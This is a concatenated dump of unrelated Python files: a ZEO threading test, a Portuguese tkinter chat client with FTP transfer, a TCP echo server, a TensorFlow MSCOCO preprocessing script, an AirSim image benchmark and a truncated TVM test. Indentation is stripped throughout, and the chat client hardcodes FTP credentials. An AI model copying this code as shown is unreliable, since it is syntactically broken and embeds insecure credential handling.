# to do the tpc_finish() when the other thread closes the storage.
def run(self):
self.storage.tpc_begin(self.trans)
oid = self.storage.new_oid()
self.storage.store(oid, ZERO, zodb_pickle(MinPO("c")), '', self.trans)
self.storage.tpc_vote(self.trans)
self.threadStartedEvent.set()
self.doNextEvent.wait(10)
try:
self.storage.tpc_finish(self.trans)
except ZEO.Exceptions.ClientStorageError:
self.gotValueError = 1
self.storage.tpc_abort(self.trans)
class GetsThroughBeginThread(BasicThread):
# This class is like the above except that it is intended to be run when
# another thread is already in a tpc_begin(). Thus, this thread will
# block in the tpc_begin until another thread closes the storage. When
# that happens, this one will get disconnected too.
def run(self):
try:
self.storage.tpc_begin(self.trans)
except ZEO.Exceptions.ClientStorageError:
self.gotValueError = 1
class ThreadTests(object):
# Thread 1 should start a transaction, but not get all the way through it.
# Main thread should close the connection. Thread 1 should then get
# disconnected.
def checkDisconnectedOnThread2Close(self):
doNextEvent = threading.Event()
threadStartedEvent = threading.Event()
thread1 = GetsThroughVoteThread(self._storage,
doNextEvent, threadStartedEvent)
thread1.start()
threadStartedEvent.wait(10)
self._storage.close()
doNextEvent.set()
thread1.join()
self.assertEqual(thread1.gotValueError, 1)
# Thread 1 should start a transaction, but not get all the way through
# it. While thread 1 is in the middle of the transaction, a second thread
# should start a transaction, and it will block in the tcp_begin() --
# because thread 1 has acquired the lock in its tpc_begin(). Now the main
# thread closes the storage and both sub-threads should get disconnected.
def checkSecondBeginFails(self):
doNextEvent = threading.Event()
threadStartedEvent = threading.Event()
thread1 = GetsThroughVoteThread(self._storage,
doNextEvent, threadStartedEvent)
thread2 = GetsThroughBeginThread(self._storage,
doNextEvent, threadStartedEvent)
thread1.start()
threadStartedEvent.wait(1)
thread2.start()
self._storage.close()
doNextEvent.set()
thread1.join()
thread2.join()
self.assertEqual(thread1.gotValueError, 1)
self.assertEqual(thread2.gotValueError, 1)
# Run a bunch of threads doing small and large stores in parallel
def checkMTStores(self):
threads = []
for i in range(5):
t = threading.Thread(target=self.mtstorehelper)
threads.append(t)
t.start()
for t in threads:
t.join(30)
for i in threads:
self.assertFalse(t.isAlive())
# Helper for checkMTStores
def mtstorehelper(self):
name = threading.currentThread().getName()
objs = []
for i in range(10):
objs.append(MinPO("X" * 200000))
objs.append(MinPO("X"))
for obj in objs:
self._dostore(data=obj)
|
client.py
|
from ftpserver import FTP_HOST, FTP_PORT
import socket
from threading import Thread
import os
import tkinter as tk
from tkinter import *
from tkinter import font
from tkinter.font import *
from tkinter import filedialog
from ftplib import FTP
import re
FTP_HOST = '192.168.15.141'
FTP_PORT = 21
BUFFERSIZE = 4096
filename = ""
# Função responsável por enviar mensagens ao servidor
def envia_mensagens(event=None):
#while True:
msg = messageInp.get()
messageInp.delete(0, END) # Limpa o campo de texto
# Se o usuário enviar uma mensagem dizendo "fim", o usuário sai da sala.
if msg.lower() == "fim":
s.sendall('[SERVIDOR] {} saiu da sala.'.format(username).encode('utf-8'))
elif msg.lower() == "receber_arquivo":
recebe_arquivo()
else:
s.sendall('{}: {}'.format(username, msg).encode('utf-8')) # (3)
def envia_arquivo(event=None): #thi- envia arquivos utilizando FDP
# try:
print('[+] Iniciando sessão (envio)...')
session = FTP(FTP_HOST, user='saet', passwd='aps')
session.login()
print(session.pwd())
session.cwd('server_data')
print('[+] Sessão concluída')
file= filedialog.askopenfile()
print('[+] File: ',file)
filepath_str = str(file).split(' ')
print('[+] Filepath as string: ',filepath_str)
filepath_str2 = filepath_str[1].split('=')
print('[+] Filepath str 2: ',filepath_str2)
filename_list = filepath_str2[1].split('/')
print('[+] Filename list: ', filename_list)
filename_p1 = filename_list[-1].split()
print('Filename_p1: ', filename_p1)
global filename
filename = filename_p1[0]
print('[+] Filename: ',filename)
aaaa = filepath_str2[1].strip('"')
print('[+] yea: ',aaaa)
with open(aaaa.strip("'"), 'rb') as f:
session.storbinary('STOR '+filename.strip("'"), f)
f.close()
# session.retrlines('LIST')
session.quit()
s.sendall('{}: {}'.format(username, "Arquivo enviado").encode('utf-8'))
# except Exception as e:
# print('Erro encontrado: ', e)
def recebe_arquivo(event=None):
print('[+] Iniciando sessão (receber)...')
session = FTP(FTP_HOST, user='saet', passwd='aps')
session.login()
print(session.pwd())
session.cwd('server_data')
print('[+] Sessão concluída')
session.retrlines('NLST')
filename = session.nlst()
with open(filename[-1], "wb") as f:
session.retrbinary(f"RETR {filename[-1]}", f.write)
f.close()
session.quit()
s.sendall('{}: {}'.format(username, "Arquivo recebido").encode('utf-8'))
# Função responsável por receber mensagens do servidor
def recebe_mensagens():
# Loop infinito para sempre estar recebendo as mensagens enquanto a conexão com o servidor estiver feita
while True:
print("Receiving message...")
msg=s.recv(BUFFERSIZE) # variável que recebe a mensagem do servidor (1)
# Condicional que verifica se a conexão ainda está feita com o servidor. ("if msg" e "if msg == True" é a mesma coisa)
if msg:
print("Printing Message...")
# Imprime a mensagem (2)
chatBoxCont.insert(tk.END, msg)
else:
print('\n[CLIENTE] Conexão perdida com o servidor!')
print('\n[CLIENTE] Saindo...')
s.close() # Fecha a conexão pendente
os._exit(0) # Fecha o sistema
root = tk.Tk() # inicia a janela principal
root.title("Chatbox") # Título da janela
root.geometry("1280x720") # Tamanho da janela
root.resizable(False, False) # Impede que a janela seja redimensionada pelo usuário
#-----------------------------------------------------------------------------------------------------
# Lista de usuários da esquerda
# master = root | faz com que o frame "chatList" seja inserido na janela geral, e não dentro de outro frame aleatório onde não deveria estar
chatList = tk.Frame(master=root, width = 300, bg = "#156950")
# fill=tk.Y --> preenche o resto da janela no eixo Y (responsividade e simplicidade)
# side=tk.LEFT --> alinha a lista na esquerda da janela
# .pack() --> "pinta" o widget (no caso o frame chatList) na tela
chatList.pack(fill = tk.Y, side=tk.LEFT)
# Configuração da fonte utilizada
f = font.Font(family="Helvetica", size=20)
f2 = font.Font(family="Helvetica", size=15)
f3 = font.Font(family="Helvetica", size=12)
# Imagem de perfil dos usuários (literalmente visual pra charme)
pfp = PhotoImage(file = "Images/ProfilePicture.png")
# Botão de cada usuário na lista para mudar o chat
userLb = tk.Button(chatList, text="Tratamento Rio", height=70, width=230, pady=2, anchor=tk.W, relief="solid", bg="#156950", bd=3, fg="white", activebackground="#1C8767", font=f2, image=pfp, compound=LEFT)
userLb.pack()
corpIcon = tk.PhotoImage(file = "Images/corpIcon.png")
corpL = tk.Label(chatList, image=corpIcon, bg="#156950")
corpL.pack(side = tk.BOTTOM)
name = tk.Label(chatList, text = "Companhia de Tratamento de Rios", bg = "#156950", fg="white", font=f3)
name.pack(side = tk.BOTTOM)
#-----------------------------------------------------------------------------------------------------
# Criação e configuração da barra superior
upperBar = tk.Frame(root, height=80, bg="#08382a", padx=10, pady=10)
upperBar.pack(fill=tk.X, side=TOP)
# Criação e configuração do nome do usuário do chat atual
currentUser = tk.Label(upperBar, text="Tratamento Rio", font=f, bg="#08382a", fg="white")
currentUser.pack(fill=tk.BOTH, side=tk.LEFT)
#-----------------------------------------------------------------------------------------------------
# Container do chat (mensagens)
chatF = font.Font(family="Helvetica", size = 14)
chatBoxCont = tk.Listbox(master = root, height=25, width=170, font=chatF)
chatBoxCont.pack(side=tk.TOP)
#-----------------------------------------------------------------------------------------------------
# Criação e configuração do container da mensagem à ser enviada
msgBoxCont = tk.Frame(master = root, height=100, bd=1, relief="solid", padx=10, pady=20)
msgBoxCont.pack(fill=tk.X, side=tk.BOTTOM)
# Criação e configuração da caixa de input da mensagem pelo usuário
messageInp = tk.Entry(msgBoxCont, bg="#cbcbcb", width=130)
messageInp.bind("<Return>", envia_mensagens)
messageInp.pack(side=tk.LEFT, fill=tk.Y)
bIcon = PhotoImage(file = "Images/SendIcon.png") # O Ícone de enviar na direita
# Criação e configuração do botão de enviar mensagem
sendB = tk.Button(msgBoxCont, image=bIcon, compound=CENTER, height=80, width=80, bd=0, relief="flat", command=envia_mensagens)
sendB.pack(side=tk.RIGHT)
plusbtn = font.Font(size = 20, family="Helvetica")
fileUpload = tk.Button(msgBoxCont, text="+", height=20, width=15, bd=0, relief="flat", font=plusbtn, command=envia_arquivo)
fileUpload.pack(side=tk.LEFT)
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
global temp_name
temp_name = tk.StringVar()
def handle_event():
temp_name = usernamefield.get()
loginRoot.destroy()
return temp_name
def enterChat():
global username
username = handle_event()
if username != "":
loginRoot.destroy()
h = '192.168.15.141'
p = 8080
# Variável que representa a conexão com o servidor
global s
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Configuração da conexão com o servidor
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.connect((h, p))
print("[SERVIDOR] Online")
# Feedback de quem entrou na sala
s.sendall('[SERVIDOR] {} entrou na sala.'.format(username).encode('utf-8'))
print('{}: '.format(username), end = '')
recebe = Thread(target=recebe_mensagens)
recebe.start()
loginRoot = tk.Toplevel(root)
loginRoot.geometry('350x200')
loginRoot.resizable(False, False)
loginRoot.title('Tela de Login')
f = font.Font(size = 25, family='Helvetica')
label = tk.Label(master = loginRoot, text = "Tela de login", foreground='black', font=f)
label.pack(side=tk.TOP)
midframe = tk.Frame(master = loginRoot)
midframe.pack(fill=tk.X)
tfLabel = tk.Label(master = midframe, text="Insira seu nome de usuário: ", foreground='black')
tfLabel.pack(padx=10, pady=35, side=tk.LEFT)
usernamefield = tk.Entry(master = midframe, bg='white', width=25, textvariable=temp_name.get())
usernamefield.pack(padx=2, side=tk.LEFT, ipady=3, fill=tk.X)
submit = tk.Button(master = loginRoot, text = "Enviar", width=20, height=2, command=enterChat)
submit.pack(side=tk.BOTTOM, pady=15)
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
try:
root.mainloop()
except ConnectionRefusedError:
print("[CLIENTE] Conexão Recusada. O servidor está fechado.")
|
server.py
|
import socket
import threading
import time
# Address
HOST = '' # server address, bind self
PORT = 8089 # 9999
print('Host:', HOST, 'Port :', PORT)
# Configure socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
print('bind ok')
s.listen(3) # Max number of clients
print('Waiting for connection...')
def main():
while True:
print('start loop in main')
# accept a new connection
sock, addr = s.accept()
print('receive msg from client')
# create a new thread to proceed Tcp connection
t = threading.Thread(target=tcplink, args=(sock, addr))
t.start()
def tcplink(sock, addr):
print('Accept new connection from %s:%s...' % addr)
sock.send(b'Welcome!')
while True:
data = sock.recv(1024)
time.sleep(0.5)
print('Receive data is:', data.decode('utf-8'))
if not data or data.decode('utf-8') == 'exit':
break
sock.send(('Hello! ' + addr[0] + ' : ' + str(addr[1])).encode('utf-8'))
sock.close()
print('Connection from %s:%s closed.' % addr)
if __name__ == '__main__':
print('Start main')
main()
|
build_mscoco_data.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts MSCOCO data to TFRecord file format with SequenceExample protos.
The MSCOCO images are expected to reside in JPEG files located in the following
directory structure:
train_image_dir/COCO_train2014_000000000151.jpg
train_image_dir/COCO_train2014_000000000260.jpg
...
and
val_image_dir/COCO_val2014_000000000042.jpg
val_image_dir/COCO_val2014_000000000073.jpg
...
The MSCOCO annotations JSON files are expected to reside in train_captions_file
and val_captions_file respectively.
This script converts the combined MSCOCO data into sharded data files consisting
of 256, 4 and 8 TFRecord files, respectively:
output_dir/train-00000-of-00256
output_dir/train-00001-of-00256
...
output_dir/train-00255-of-00256
and
output_dir/val-00000-of-00004
...
output_dir/val-00003-of-00004
and
output_dir/test-00000-of-00008
...
output_dir/test-00007-of-00008
Each TFRecord file contains ~2300 records. Each record within the TFRecord file
is a serialized SequenceExample proto consisting of precisely one image-caption
pair. Note that each image has multiple captions (usually 5) and therefore each
image is replicated multiple times in the TFRecord files.
The SequenceExample proto contains the following fields:
context:
image/image_id: integer MSCOCO image identifier
image/data: string containing JPEG encoded image in RGB colorspace
feature_lists:
image/caption: list of strings containing the (tokenized) caption words
image/caption_ids: list of integer ids corresponding to the caption words
The captions are tokenized using the NLTK (http://www.nltk.org/) word tokenizer.
The vocabulary of word identifiers is constructed from the sorted list (by
descending frequency) of word tokens in the training set. Only tokens appearing
at least 4 times are considered; all other words get the "unknown" word id.
NOTE: This script will consume around 100GB of disk space because each image
in the MSCOCO dataset is replicated ~5 times (once per caption) in the output.
This is done for two reasons:
1. In order to better shuffle the training data.
2. It makes it easier to perform asynchronous preprocessing of each image in
TensorFlow.
Running this script using 16 threads may take around 1 hour on a HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import Counter
from collections import namedtuple
from datetime import datetime
import json
import os.path
import random
import sys
import threading
import nltk.tokenize
import numpy as np
import tensorflow as tf
tf.flags.DEFINE_string("train_image_dir", "/tmp/train2014/",
"Training image directory.")
tf.flags.DEFINE_string("val_image_dir", "/tmp/val2014",
"Validation image directory.")
tf.flags.DEFINE_string("train_captions_file", "/tmp/captions_train2014.json",
"Training captions JSON file.")
tf.flags.DEFINE_string("val_captions_file", "/tmp/captions_train2014.json",
"Validation captions JSON file.")
tf.flags.DEFINE_string("output_dir", "/tmp/", "Output data directory.")
tf.flags.DEFINE_integer("train_shards", 256,
"Number of shards in training TFRecord files.")
tf.flags.DEFINE_integer("val_shards", 4,
"Number of shards in validation TFRecord files.")
tf.flags.DEFINE_integer("test_shards", 8,
"Number of shards in testing TFRecord files.")
tf.flags.DEFINE_string("start_word", "<S>",
"Special word added to the beginning of each sentence.")
tf.flags.DEFINE_string("end_word", "</S>",
"Special word added to the end of each sentence.")
tf.flags.DEFINE_string("unknown_word", "<UNK>",
"Special word meaning 'unknown'.")
tf.flags.DEFINE_integer("min_word_count", 4,
"The minimum number of occurrences of each word in the "
"training set for inclusion in the vocabulary.")
tf.flags.DEFINE_string("word_counts_output_file", "/tmp/word_counts.txt",
"Output vocabulary file of word counts.")
tf.flags.DEFINE_integer("num_threads", 8,
"Number of threads to preprocess the images.")
FLAGS = tf.flags.FLAGS
ImageMetadata = namedtuple("ImageMetadata",
["image_id", "filename", "captions"])
class Vocabulary(object):
"""Simple vocabulary wrapper."""
def __init__(self, vocab, unk_id):
"""Initializes the vocabulary.
Args:
vocab: A dictionary of word to word_id.
unk_id: Id of the special 'unknown' word.
"""
self._vocab = vocab
self._unk_id = unk_id
def word_to_id(self, word):
"""Returns the integer id of a word string."""
if word in self._vocab:
return self._vocab[word]
else:
return self._unk_id
class ImageDecoder(object):
"""Helper class for decoding images in TensorFlow."""
def __init__(self):
# Create a single TensorFlow Session for all image decoding calls.
self._sess = tf.Session()
# TensorFlow ops for JPEG decoding.
self._encoded_jpeg = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._encoded_jpeg, channels=3)
def decode_jpeg(self, encoded_jpeg):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._encoded_jpeg: encoded_jpeg})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _int64_feature(value):
"""Wrapper for inserting an int64 Feature into a SequenceExample proto."""
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _bytes_feature(value):
"""Wrapper for inserting a bytes Feature into a SequenceExample proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[str(value)]))
def _int64_feature_list(values):
"""Wrapper for inserting an int64 FeatureList into a SequenceExample proto."""
return tf.train.FeatureList(feature=[_int64_feature(v) for v in values])
def _bytes_feature_list(values):
"""Wrapper for inserting a bytes FeatureList into a SequenceExample proto."""
return tf.train.FeatureList(feature=[_bytes_feature(v) for v in values])
def _to_sequence_example(image, decoder, vocab):
"""Builds a SequenceExample proto for an image-caption pair.
Args:
image: An ImageMetadata object.
decoder: An ImageDecoder object.
vocab: A Vocabulary object.
Returns:
A SequenceExample proto.
"""
with tf.gfile.FastGFile(image.filename, "r") as f:
encoded_image = f.read()
try:
decoder.decode_jpeg(encoded_image)
except (tf.errors.InvalidArgumentError, AssertionError):
print("Skipping file with invalid JPEG data: %s" % image.filename)
return
context = tf.train.Features(feature={
"image/image_id": _int64_feature(image.image_id),
"image/data": _bytes_feature(encoded_image),
})
assert len(image.captions) == 1
caption = image.captions[0]
caption_ids = [vocab.word_to_id(word) for word in caption]
feature_lists = tf.train.FeatureLists(feature_list={
"image/caption": _bytes_feature_list(caption),
"image/caption_ids": _int64_feature_list(caption_ids)
})
sequence_example = tf.train.SequenceExample(
context=context, feature_lists=feature_lists)
return sequence_example
def _process_image_files(thread_index, ranges, name, images, decoder, vocab,
num_shards):
"""Processes and saves a subset of images as TFRecord files in one thread.
Args:
thread_index: Integer thread identifier within [0, len(ranges)].
ranges: A list of pairs of integers specifying the ranges of the dataset to
process in parallel.
name: Unique identifier specifying the dataset.
images: List of ImageMetadata.
decoder: An ImageDecoder object.
vocab: A Vocabulary object.
num_shards: Integer number of shards for the output files.
"""
# Each thread produces N shards where N = num_shards / num_threads. For
# instance, if num_shards = 128, and num_threads = 2, then the first thread
# would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0], ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_images_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in xrange(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = "%s-%.5d-of-%.5d" % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_dir, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
images_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in images_in_shard:
image = images[i]
sequence_example = _to_sequence_example(image, decoder, vocab)
if sequence_example is not None:
writer.write(sequence_example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print("%s [thread %d]: Processed %d of %d items in thread batch." %
(datetime.now(), thread_index, counter, num_images_in_thread))
sys.stdout.flush()
print("%s [thread %d]: Wrote %d image-caption pairs to %s" %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print("%s [thread %d]: Wrote %d image-caption pairs to %d shards." %
(datetime.now(), thread_index, counter, num_shards_per_batch))
sys.stdout.flush()
def _process_dataset(name, images, vocab, num_shards):
"""Processes a complete data set and saves it as a TFRecord.
Args:
name: Unique identifier specifying the dataset.
images: List of ImageMetadata.
vocab: A Vocabulary object.
num_shards: Integer number of shards for the output files.
"""
# Break up each image into a separate entity for each caption.
images = [ImageMetadata(image.image_id, image.filename, [caption])
for image in images for caption in image.captions]
# Shuffle the ordering of images. Make the randomization repeatable.
random.seed(12345)
random.shuffle(images)
# Break the images into num_threads batches. Batch i is defined as
# images[ranges[i][0]:ranges[i][1]].
num_threads = min(num_shards, FLAGS.num_threads)
spacing = np.linspace(0, len(images), num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in xrange(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a utility for decoding JPEG images to run sanity checks.
decoder = ImageDecoder()
# Launch a thread for each batch.
print("Launching %d threads for spacings: %s" % (num_threads, ranges))
for thread_index in xrange(len(ranges)):
args = (thread_index, ranges, name, images, decoder, vocab, num_shards)
t = threading.Thread(target=_process_image_files, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print("%s: Finished processing all %d image-caption pairs in data set '%s'." %
(datetime.now(), len(images), name))
def _create_vocab(captions):
"""Creates the vocabulary of word to word_id.
The vocabulary is saved to disk in a text file of word counts. The id of each
word in the file is its corresponding 0-based line number.
Args:
captions: A list of lists of strings.
Returns:
A Vocabulary object.
"""
print("Creating vocabulary.")
counter = Counter()
for c in captions:
counter.update(c)
print("Total words:", len(counter))
# Filter uncommon words and sort by descending count.
word_counts = [x for x in counter.items() if x[1] >= FLAGS.min_word_count]
word_counts.sort(key=lambda x: x[1], reverse=True)
print("Words in vocabulary:", len(word_counts))
# Write out the word counts file.
with tf.gfile.FastGFile(FLAGS.word_counts_output_file, "w") as f:
f.write("\n".join(["%s %d" % (w, c) for w, c in word_counts]))
print("Wrote vocabulary file:", FLAGS.word_counts_output_file)
# Create the vocabulary dictionary.
reverse_vocab = [x[0] for x in word_counts]
unk_id = len(reverse_vocab)
vocab_dict = dict([(x, y) for (y, x) in enumerate(reverse_vocab)])
vocab = Vocabulary(vocab_dict, unk_id)
return vocab
def _process_caption(caption):
"""Processes a caption string into a list of tonenized words.
Args:
caption: A string caption.
Returns:
A list of strings; the tokenized caption.
"""
tokenized_caption = [FLAGS.start_word]
tokenized_caption.extend(nltk.tokenize.word_tokenize(caption.lower()))
tokenized_caption.append(FLAGS.end_word)
return tokenized_caption
def _load_and_process_metadata(captions_file, image_dir):
"""Loads image metadata from a JSON file and processes the captions.
Args:
captions_file: JSON file containing caption annotations.
image_dir: Directory containing the image files.
Returns:
A list of ImageMetadata.
"""
with tf.gfile.FastGFile(captions_file, "r") as f:
caption_data = json.load(f)
# Extract the filenames.
id_to_filename = [(x["id"], x["file_name"]) for x in caption_data["images"]]
# Extract the captions. Each image_id is associated with multiple captions.
id_to_captions = {}
for annotation in caption_data["annotations"]:
image_id = annotation["image_id"]
caption = annotation["caption"]
id_to_captions.setdefault(image_id, [])
id_to_captions[image_id].append(caption)
assert len(id_to_filename) == len(id_to_captions)
assert set([x[0] for x in id_to_filename]) == set(id_to_captions.keys())
print("Loaded caption metadata for %d images from %s" %
(len(id_to_filename), captions_file))
# Process the captions and combine the data into a list of ImageMetadata.
print("Proccessing captions.")
image_metadata = []
num_captions = 0
for image_id, base_filename in id_to_filename:
filename = os.path.join(image_dir, base_filename)
captions = [_process_caption(c) for c in id_to_captions[image_id]]
image_metadata.append(ImageMetadata(image_id, filename, captions))
num_captions += len(captions)
print("Finished processing %d captions for %d images in %s" %
(num_captions, len(id_to_filename), captions_file))
return image_metadata
def main(unused_argv):
def _is_valid_num_shards(num_shards):
"""Returns True if num_shards is compatible with FLAGS.num_threads."""
return num_shards < FLAGS.num_threads or not num_shards % FLAGS.num_threads
assert _is_valid_num_shards(FLAGS.train_shards), (
"Please make the FLAGS.num_threads commensurate with FLAGS.train_shards")
assert _is_valid_num_shards(FLAGS.val_shards), (
"Please make the FLAGS.num_threads commensurate with FLAGS.val_shards")
assert _is_valid_num_shards(FLAGS.test_shards), (
"Please make the FLAGS.num_threads commensurate with FLAGS.test_shards")
if not tf.gfile.IsDirectory(FLAGS.output_dir):
tf.gfile.MakeDirs(FLAGS.output_dir)
# Load image metadata from caption files.
mscoco_train_dataset = _load_and_process_metadata(FLAGS.train_captions_file,
FLAGS.train_image_dir)
mscoco_val_dataset = _load_and_process_metadata(FLAGS.val_captions_file,
FLAGS.val_image_dir)
# Redistribute the MSCOCO data as follows:
# train_dataset = 100% of mscoco_train_dataset + 85% of mscoco_val_dataset.
# val_dataset = 5% of mscoco_val_dataset (for validation during training).
# test_dataset = 10% of mscoco_val_dataset (for final evaluation).
train_cutoff = int(0.85 * len(mscoco_val_dataset))
val_cutoff = int(0.90 * len(mscoco_val_dataset))
train_dataset = mscoco_train_dataset + mscoco_val_dataset[0:train_cutoff]
val_dataset = mscoco_val_dataset[train_cutoff:val_cutoff]
test_dataset = mscoco_val_dataset[val_cutoff:]
# Create vocabulary from the training captions.
train_captions = [c for image in train_dataset for c in image.captions]
vocab = _create_vocab(train_captions)
_process_dataset("train", train_dataset, vocab, FLAGS.train_shards)
_process_dataset("val", val_dataset, vocab, FLAGS.val_shards)
_process_dataset("test", test_dataset, vocab, FLAGS.test_shards)
if __name__ == "__main__":
tf.app.run()
|
baseline_racer_image_benchmarker.py
|
from argparse import ArgumentParser
import airsimneurips as airsim
import time
import utils
import threading
import numpy as np
import cv2
from baseline_racer import BaselineRacer
class BaselineRacerImageBenchmarker(BaselineRacer):
def __init__(self,
img_benchmark_type = 'simGetImage',
drone_name = "drone_1",
viz_traj = False,
viz_traj_color_rgba=[1.0, 1.0, 0.0, 1.0],
viz_image_cv2 = False):
super().__init__(drone_name=drone_name, viz_traj=viz_traj, viz_image_cv2=viz_image_cv2)
self.image_benchmark_num_images = 0
self.image_benchmark_total_time = 0.0
self.image_callback_thread = None
if img_benchmark_type == "simGetImage":
self.image_callback_thread = threading.Thread(target=self.repeat_timer_img, args=(self.image_callback_benchmark_simGetImage, 0.05))
if img_benchmark_type == "simGetImages":
self.image_callback_thread = threading.Thread(target=self.repeat_timer_img, args=(self.image_callback_benchmark_simGetImages, 0.05))
self.is_image_thread_active = False
def start_img_benchmark_thread(self):
if not self.is_image_thread_active:
self.is_image_thread_active = True
self.image_callback_thread.start()
print("Started img image_callback thread")
def stop_img_benchmark_thread(self):
if self.is_image_thread_active:
self.is_image_thread_active = False
self.image_callback_thread.join()
print("Stopped image callback thread.")
def repeat_timer_img(self, task, period):
while self.is_image_thread_active:
task()
time.sleep(period)
def print_benchmark_results(self):
avg_fps = 1.0 / ((self.image_benchmark_total_time) / float(self.image_benchmark_num_images))
print(self.level_name + ": {} avg_fps for {} num of images".format(avg_fps, self.image_benchmark_num_images))
def image_callback_benchmark_simGetImage(self):
self.image_benchmark_num_images += 1
iter_start_time = time.time()
response = self.airsim_client_images.simGetImage("fpv_cam", airsim.ImageType.Scene)
img_rgb = cv2.imdecode(airsim.string_to_uint8_array(response), cv2.IMREAD_UNCHANGED)
self.image_benchmark_total_time += time.time() - iter_start_time
avg_fps = 1.0 / ((self.image_benchmark_total_time) / float(self.image_benchmark_num_images))
print(self.level_name + ": {} avg_fps for {} num of images".format(avg_fps, self.image_benchmark_num_images))
# uncomment following lines to viz image
# if self.viz_image_cv2:
# cv2.imshow("img_rgb", img_rgb_1d_new)
# cv2.waitKey(1)
def image_callback_benchmark_simGetImages(self):
self.image_benchmark_num_images += 1
iter_start_time = time.time()
request = [airsim.ImageRequest("fpv_cam", airsim.ImageType.Scene, False, False)]
response = self.airsim_client_images.simGetImages(request)
img_rgb_1d = np.fromstring(response[0].image_data_uint8, dtype=np.uint8)
img_rgb = img_rgb_1d.reshape(response[0].height, response[0].width, 3)
self.image_benchmark_total_time += time.time() - iter_start_time
avg_fps = 1.0 / ((self.image_benchmark_total_time) / float(self.image_benchmark_num_images))
print(self.level_name + ": {} avg_fps for {} num of images".format(avg_fps, self.image_benchmark_num_images))
# uncomment following lines to viz image
# if self.viz_image_cv2:
# cv2.imshow("img_rgb", img_rgb_1d_new)
# cv2.waitKey(1)
def main(args):
# ensure you have generated the neurips planning settings file by running python generate_settings_file.py
baseline_racer = BaselineRacerImageBenchmarker(img_benchmark_type=args.img_benchmark_type, \
drone_name="drone_1", \
viz_traj=args.viz_traj, \
viz_traj_color_rgba=[1.0, 1.0, 0.0, 1.0], \
viz_image_cv2=args.viz_image_cv2)
baseline_racer.load_level(args.level_name)
if args.level_name == "Qualifier_Tier_1":
args.race_tier = 1
if args.level_name == "Qualifier_Tier_2":
args.race_tier = 2
if args.level_name == "Qualifier_Tier_3":
args.race_tier = 3
baseline_racer.start_race(args.race_tier)
baseline_racer.initialize_drone()
baseline_racer.takeoff_with_moveOnSpline()
baseline_racer.get_ground_truth_gate_poses()
baseline_racer.start_img_benchmark_thread()
baseline_racer.fly_through_all_gates_at_once_with_moveOnSpline().join()
baseline_racer.stop_img_benchmark_thread()
baseline_racer.print_benchmark_results()
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument('--level_name', type=str, choices=["Soccer_Field_Easy", "Soccer_Field_Medium", "ZhangJiaJie_Medium", "Building99_Hard",
"Qualifier_Tier_1", "Qualifier_Tier_2", "Qualifier_Tier_3"], default="ZhangJiaJie_Medium")
parser.add_argument('--enable_viz_traj', dest='viz_traj', action='store_true', default=False)
parser.add_argument('--img_benchmark_type', type=str, choices=["simGetImage", "simGetImages"], default="simGetImages")
parser.add_argument('--enable_viz_image_cv2', dest='viz_image_cv2', action='store_true', default=False)
parser.add_argument('--race_tier', type=int, choices=[1,2,3], default=1)
args = parser.parse_args()
main(args)
|
test_codegen_vulkan.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
import re
import numpy as np
def test_vector_comparison():
if not tvm.runtime.enabled("vulkan"):
print("Skipping due to no Vulkan module")
return
target = 'vulkan'
def check_correct_assembly(dtype):
n = (1024,)
A = tvm.placeholder(n, dtype=dtype, name='A')
B = tvm.compute(
A.shape,
